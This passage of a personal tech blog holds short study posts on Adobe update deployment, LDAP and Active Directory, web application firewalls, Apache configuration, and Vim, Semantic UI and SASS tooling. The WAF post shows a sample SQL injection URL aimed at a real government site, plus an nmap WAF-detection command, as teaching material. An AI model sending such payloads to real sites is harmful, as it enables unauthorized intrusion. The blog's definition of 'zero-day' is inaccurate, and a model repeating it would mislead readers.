"System Center Updates Publisher (SCUP) is a stand-alone tool that is used in conjunction with Microsoft’s System Center Configuration Manager (CM hereafter) to allow administrators to more accurately and efficiently install and update software. Together, CM and SCUP are Microsoft’s latest change and configuration management solution that replaces older methodologies such as SMS and GPO. Unlike those technologies, CM provides features such as metering, asset intelligence, and improved remote client administration. For example, CM users can easily determine what products versions are installed including all dot and double dot patches without having to write a complicated query." - Adobe.com</div>
<div>
<br /></div>
<div>
Simply to say, SCUP/SCCM is a newer solution came up after the previous two solutions. SCUP is a catelog file, CM is the way to publish/manage the updates. However, since it's a newer solution, it only works on 10.x and later Adobe products.</div>
<br /><h3>
Summary</h3>
<div>
From the documentation and the software updates, we can learn that Adobe is caring about the security issue nicely. They publish patches to deal with known CVE problems, and offer several methods help IT administrator or individuals to update. However, without knowing the real challenge that MOI has, it's quite funny that we were doing the updates manually by visiting every user on seat.</div>
<br /><h3>
Reference</h3>
<div>
<ul>
<li><a href="http://www.klaus-hartnegg.de/gpo/aip.html">Administrative Installation Point (AIP)</a></li>
<li><a href="http://www.klaus-hartnegg.de/gpo/gpo.html">GPO</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/cc759262(v=ws.10).aspx">Msiexec (command-line options)</a></li>
<li><a href="https://community.spiceworks.com/how_to/479-creating-an-administrative-install-point-for-adobe-reader-to-deploy-via-gpo">Creating an Administrative Install Point for Adobe Reader (To deploy via GPO)</a></li>
<li><a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/AdminGuide/gpo.html">Group Policy-Active Directory</a></li>
<li><a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/AdminGuide/bootstrapper.html">Bootstrapper Deployment</a></li>
<li><a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/AdminGuide/sccm.html">SCCM-SCUP</a></li>
</ul>
</div>
<div>
<br /></div>Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-51866732382663510162015-09-02T02:09:00.000+08:002015-09-02T02:09:05.541+08:00Lightweight Directory Access Protocol (LDAP) & Active Directory (AD)<h3>
Preface</h3>
From a security standpoint, it's better to update your softwares all the time since the old version may have some existing security problems. There's a common name for this kind of hacking which is called "zero-day". Here's how it work: a hacker first scans the versions of softwares you are using, and if he/she found that you're using a older version software, he/she will go find if there's any existing security problem under that version. This is called zero-day since once the vulnerability is release to the public, people have zero-day to fix the problem while all the machines are under threat.<br />
<br />
So, to reduce the threat, we keep our software updated. However, there may be tons of computers under one organization, there should be solutions under different platforms to update all the computers correctly, remotely, and efficiently.<br />
<br />
<h3>
Lightweight Directory Access Protocol (LDAP)</h3>
<h4>
Short Description</h4>
"LDAP is a directory service protocol that runs on a layer above the TCP/IP stack. It provides a mechanism used to connect to, search, and modify Internet directories. It's based on a client-server model." - MSDN<br />
<br />
<h4>
Information Model (date and namespaces)</h4>
It's similar to that of the X.500 OSI directory service, but with fewer features and lower resource requirements than X.500.<br />
<br />
<h4>
API</h4>
<br />
<ul>
<li>initialize a session (ldap_init, ldap_sslinit)</li>
<li>bind to the server (ladp_connect)</li>
<li>modify a directory entry, etc.</li>
</ul>
<div>
<br /></div>
<h4>
Distinguished Name (DN)</h4>
<div>
A DN is a sequence of relative distinguished names (RDN) connected by commas. Typical RDNs are as below:</div>
<div>
<ul>
<li>DC: domainComponent</li>
<li>CN: commonName</li>
<li>OU: organizationalUnitName</li>
<li>O: organizationName</li>
<li>STREET: streetAddress</li>
<li>L: localityName</li>
<li>ST: stateOrProvinceName</li>
<li>C: countryName</li>
<li>UID: userid</li>
</ul>
<div>
So, it looks like: <b>CN=Jeff Smith,OU=Sales,DC=Fabrikam,DC=COM</b></div>
</div>
<div>
<br /></div>
<h3>
Active Directory (AD)</h3>
<br />
"Active Directory is a directory service that Microsoft developed for <u>Windows domain networks</u> and is included in most <u>Windows Server</u> operating systems. An AD domain controller authenticates and authorizes all the users and computers in a Windows domain type network - <u>assigning and enforcing security policies for all computers and installing or updating software</u>. It makes use of LDAP version 2 and 3, Microsoft's version of Kerberos, and DNS" - Wikipedia<br />
<br />
To simplify, AD is Microsoft's solution for LDAP, which is designed for Windows environment. And, yes, it's much more complicated on its domain design.<br />
<br />
<h3>
Reference</h3>
<br />
<ul>
<li><a href="https://msdn.microsoft.com/en-us/library/aa367008(v=vs.85).aspx">Lightweight Directory Access Protocol - MDSN</a></li>
<li><a href="https://en.wikipedia.org/wiki/Active_Directory">Active Directory - Wiki</a></li>
</ul>
<br />
<br />Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-62833644355358050622015-09-02T00:53:00.000+08:002015-09-02T00:53:11.828+08:00Web Application Firewall<h3>
Preface</h3>
This is the first post documenting my studies while working in Ministry of the Interior (Taiwan). Though it's my alternative military service job, I am trying my best to learn from it.<br />
<br />
While I was in the warehouse, I found Web Application Firewall (WAF), which is a real device. And, it's my first time to see look into this device, then here's my study on it.<br />
<br />
<h3>
What is WAF?</h3>
<div>
It's a firewall that applies rules on HTTP conversation (application layer), which is defencing attacks like cross-site scripting (XSS), SQL injection, malicious sources, application layer DoS Attacks, etc.</div>
<div>
<br /></div>
<div>
So, what's the difference between WAF and network layer firewalls (which we use more often)? Network layer firewalls operates at TCP/IP protocol level, which only lookup rules based on IP/port. They don't care about the content in application layer.</div>
<div>
<br /></div>
<div>
Here's an example referring to "<a href="http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html">Guide to WAF Bypass by SecurityIdiots</a>". The first line is a normal request, and the second is a request with SQL injection. However, the second one is detected by MOD security WAF.</div>
<blockquote class="tr_bq">
http://bpc.gov.bd/contactus.php?id=4<br />
http://bpc.gov.bd/contactus.php?id=4' UNION SELECT 1,2,3-- -</blockquote>
<br />
<h3>
Detecting WAF</h3>
<div>
To detect WAF, we can use NMAP like:</div>
<blockquote class="tr_bq">
nmap -p80 --script http-waf-detect <host> </blockquote>
<br />
<h3>
Does WAF Work on HTTPS?</h3>
<div>
Yes or no. Since HTTPS packages are encoded, WAF shouldn't be able to read their contents. However, there are two ways for a WAF to read SSL-protected traffic:</div>
<div>
<ul>
<li>The WAF also obtains the private key used by the original SSL server.</li>
<li>The WAF runs its own SSL server which is seem and used by the client. And, the WAF would decrypt the traffic first, applies its rules, then forwards it to the original server with SSL-protected.</li>
</ul>
</div>
<br />
<h3>
WAF Vendors / Players</h3>
<div>
Software (lower cost, but should avoid poor setups)</div>
<div>
<ul>
<li>ModSecurity</li>
<li>AQTRONIX WebKnight</li>
</ul>
<div>
Hardware (scalability, performance)</div>
</div>
<div>
<ul>
<li>FortiWeb</li>
<li>Barracuda Networks</li>
</ul>
</div>
<br />
<h3>
Reference</h3>
<div>
<ul>
<li><a href="http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html">Guide to WAF Bypass by SecurityIdiots</a></li>
<li><a href="http://security.stackexchange.com/questions/44563/is-ssl-required-for-sites-hosted-behind-waf">Is SSL required for sites hosted behind WAF?</a></li>
</ul>
</div>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-1159238567442216802015-04-24T14:26:00.000+08:002015-04-24T14:26:28.283+08:00Apache Configuration<h3>
Preface</h3>
<br />
Writing Apache config file is required and basic for setting up a new website using Apache. It's easy for basic types of websites since you can find template files online, and only a little modification is needed. However, this turned out that I still don't really know much about how to write the config file even I have set up tons of websites already.<br />
<br />
Setting up simple static websites with virtual host, or setting up Wordpress websites is easy. But, if we want to fully and nicely control the permission or setup a Django app would be complex. So, I am writing this article as a note about Apache config files.<br />
<br />
<h3>
Environment</h3>
I am using Ubuntu 14.04, so I installed those tools by having following commands:<br />
<br />
<script src="https://gist.github.com/heronyang/6b565a5c895fdd332d5b.js"></script>
Then, instead of modifying existing config files, I think it's a better idea to add new files under /etc/apache2/sites-available to extends the setting. For my case, I add "bugkiller.conf" for my new website called Bug Killer.<br />
<br />
Also, since in most of the time, I build more than one website on a machine, so "<a href="http://httpd.apache.org/docs/2.2/vhosts/">virtual host</a>" became essential setting in my case. This is the way to make Apache gave different outputs based on its domain name.<br />
<br />
<h3>
Case 1. Setup Static Websites (using Virtual Host)</h3>
<script src="https://gist.github.com/heronyang/357b0cb82ee229f50005.js"></script>
<ul>
<li>ServerAdmin is the email address where receives error logs (or any other logs based on your setting),</li>
<li>ServerName and ServerAlias are the domain name for your new website,</li>
<li>DocumentRoot is the root directory path of your static website folder</li>
<li>For logging, it means that logs at LogLevel "warn", and will be saved in ErrorLog and CustomLog.</li>
</ul>
<div>
And, in order to let the web server process to access the folder correctly, we give the folder all the permission by saying "AllowOverride All".</div>
<div>
<br /></div>
<div>
<h3>
Case 2. Setup Wordpress Websites (using Virtual Host)</h3>
Same as "Case 1".<br />
<br />
<h3>
Case 3. Setup Django Applications (using Virtual Host)</h3>
<br />
<script src="https://gist.github.com/heronyang/fd762cd0a1939f6ea20c.js"></script>
<ul>
<li>WSGIPythonPath: The path for Django project root folder. By setting up this correctly, the server process will know where are those python files locate.</li>
<li>WSGIScriptAlias: The path to Django wsgi file, which is a gateway that wires external sockets to our Django project. So, Django should start to work after setting up this path correctly.</li>
<li>Directory tag: This part is pretty alike static files, one should give out the permission to read wsgi.py file in order to access the gateway.</li>
<li>For static files, Apache server has to handle the since it is not supported when DEBUG=FALSE in Django setting. What we have to do is route the "/static/" requests to our static folder and give out permission for that folder.</li>
<li>LogLevel debug: This helped me a lot for debugging, which allowed me to read the setting errors in the default log file (/var/log/apache2/error.log or /var/log/apache2/access.log)</li>
</ul>
</div>Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-65599594341963369442015-03-27T21:55:00.000+08:002015-03-27T21:55:16.314+08:00A Fast Way to Generate LaTeX Document using VIMFinally, I found a fast way to generate a LaTeX document using VIM, which allows me have a basic LaTeX document within few seconds. However, a little background knowledge on MarkDown syntax is required (MarkDown Cheatsheet is <a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">here</a>).<br />
<br />
<h3>
Step 0: setup</h3>
<h4>
a. install <a href="http://johnmacfarlane.net/pandoc/installing.html">pandoc</a></h4>
<h4>
b. add one line of setting into .vimrc (only have to do once)</h4>
<blockquote class="tr_bq">
map \md <ESC>:!pandoc -V geometry:margin=1in % -s -o %<.pdf<CR>:!open %<.pdf<CR></blockquote>
This is for Mac, if you are using other system, please change "open" to any PDF reader you have on your machine.<br />
<br />
<h3>
Step 1: open a new .md file</h3>
<blockquote class="tr_bq">
vim test.md</blockquote>
<br />
<h3>
Step 2: write some MarkDown and save</h3>
<blockquote class="tr_bq">
## This is title<br />
<br />
### Header is here<br />
<br />
- list 1<br />
<br />
- list 2</blockquote>
<h3>
Step 3: press following keys in vim: <ESC> \ m d</h3>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD56MrO5_3Snnct2S3xpN9O2A6y7qZt_1xuEIpHi7_UUsP9hCHwAbkwZx7B6PwJUTAwPQX6YFwR4fEOohIn6JzjxT9EJG7yFVTCxlW2d3TMFOmjCWlBYw3udXngJpUyL4BTIODtLE3WYSw/s1600/Screen+Shot+2015-03-27+at+9.51.37+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD56MrO5_3Snnct2S3xpN9O2A6y7qZt_1xuEIpHi7_UUsP9hCHwAbkwZx7B6PwJUTAwPQX6YFwR4fEOohIn6JzjxT9EJG7yFVTCxlW2d3TMFOmjCWlBYw3udXngJpUyL4BTIODtLE3WYSw/s1600/Screen+Shot+2015-03-27+at+9.51.37+AM.png" height="400" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PDF file will popup automatically</td></tr>
</tbody></table>
<h3>
Notice</h3>
<div>
<ul>
<li>More settings can be passed into pandoc by adding parameters.</li>
<li>This is fast way to have basic LaTeX documents, but may not be the most customised way.</li>
</ul>
</div>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-38843440144238765992015-03-20T05:13:00.000+08:002015-03-20T05:13:03.342+08:00Setup Semantic UI<h3>
Preface</h3>
<div>
There are tons of front-end development frameworks, and Semantic UI is one of them. I found it's support more elements than other with complete design. So, I am trying out this time.</div>
<div>
<br /></div>
<h3>
Dependencies</h3>
<div>
There are the things needed to be install before get started:</div>
<div>
<ul>
<li>node</li>
<ul>
<li>Mac: "brew install node"</li>
<li>Windows: <a href="http://nodejs.org/download/">binary file here</a></li>
</ul>
<li>gulp</li>
<ul>
<li>npm install -g gulp</li>
</ul>
</ul>
<div>
Other dependencies for Semantic UI:</div>
</div>
<div>
<ul>
<li>cd <Semantic-UI directory></li>
<li>npm install</li>
</ul>
<div>
<br /></div>
</div>
<h3>
Build Framework</h3>
<div>
So, we can customize our design or change the theme on Semantic UI (not included in this post), then it will generate some CSS and JS files for our website to use.</div>
<div>
To generate the files, type: "gulp install"</div>
<div>
<br /></div>
<h3>
Reference</h3>
<div>
<ul>
<li><a href="http://learnsemantic.com/guide/expert.html">Getting Semantic UI</a></li>
</ul>
</div>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-52796199603134603832015-03-19T05:58:00.001+08:002015-03-19T05:58:49.924+08:00SASS - HelloworldFor people who write CSS may know that it's kind of annoying, SASS and SCSS became the solutions. We've learned some basic SCSS code in Advanced Web Design class today, and it's <a href="https://github.com/heronyang/sass-example">here</a>.<br />
<br />
To compile the SCSS, run "sass --watch ." in the background, and it will update the CSS file constantly.<br />
<br />
And, I also asked Prof. Twigg which one should I go with as a beginner, SASS or SCSS. He said SCSS, which is newer.Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0